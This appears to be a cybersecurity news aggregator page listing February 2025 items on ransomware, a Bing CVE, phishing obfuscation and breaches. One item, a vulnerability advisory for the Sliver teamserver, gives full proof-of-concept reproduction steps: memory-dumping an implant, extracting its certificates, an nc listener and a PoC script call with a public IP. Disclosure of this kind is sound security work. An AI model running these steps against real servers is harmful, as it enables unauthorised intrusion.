![]() |
Description: Ransomware Attack Update for 19th of February 2025
February 20th, 2025 (5 months ago)
|
CVE-2025-21355 |
Description: CVE-2025-21355: Microsoft Bing Remote Code Execution Vulnerability
CVSS: HIGH (8.6) EPSS Score: 1.08%
February 19th, 2025 (5 months ago)
|
![]() |
Description: These sorts of attacks reveal growing adversary interest in secure messaging apps used by high-value targets for communication, Google says.
February 19th, 2025 (5 months ago)
|
![]() |
Description: The start-up incubator and PR firm with holdings in more than 70 cybersecurity firms has announced a data breach with as-yet-unknown effects.
February 19th, 2025 (5 months ago)
|
![]() |
Description: Summary
The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so
Reproduction steps
Run server
wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux
chmod +x sliver-server_linux
./sliver-server_linux
Generate binary
generate --mtls 127.0.0.1:8443
Run it on windows, then Task manager -> find process -> Create memory dump file
Install RogueSliver and get the certs
git clone https://github.com/ACE-Responder/RogueSliver.git
pip3 install -r requirements.txt --break-system-packages
python3 ExtractCerts.py implant.dmp
Start callback listener. Teamserver will connect when POC is run and send "ssrf poc" to nc
nc -nvlp 1111
Run the poc (pasted at bottom of this file)
python3 poc.py
python3 poc.py 192.168.1.33 8443 44.221.186.72 1111
Details
We see here an envelope is read from the connection and if the envelope.Type matches a handler the handler will be executed
func handleSliverConnection(conn net.Conn) {
mtlsLog.Infof("Accepted incoming connection: %s", conn.RemoteAddr())
implantConn := core.NewImplantConnection(consts.MtlsStr, conn.RemoteAddr().String())
defer func() {
mtlsLog.Debugf("mtls connection closing")
conn.Close()
implantConn.Cleanup()
}()
done := make(chan bool)
go func() {
defer func() {
done <- true
}()
handlers := se...
February 19th, 2025 (5 months ago)
|
![]() |
February 19th, 2025 (5 months ago)
|
![]() |
Description: CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations. [...]
February 19th, 2025 (5 months ago)
|
![]() |
February 19th, 2025 (5 months ago)
|
![]() |
Description: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC). [...]
February 19th, 2025 (5 months ago)
|
![]() |
Description: LazaGrad Hack Targeted the Website of University of Religions and Denominations
February 19th, 2025 (5 months ago)
|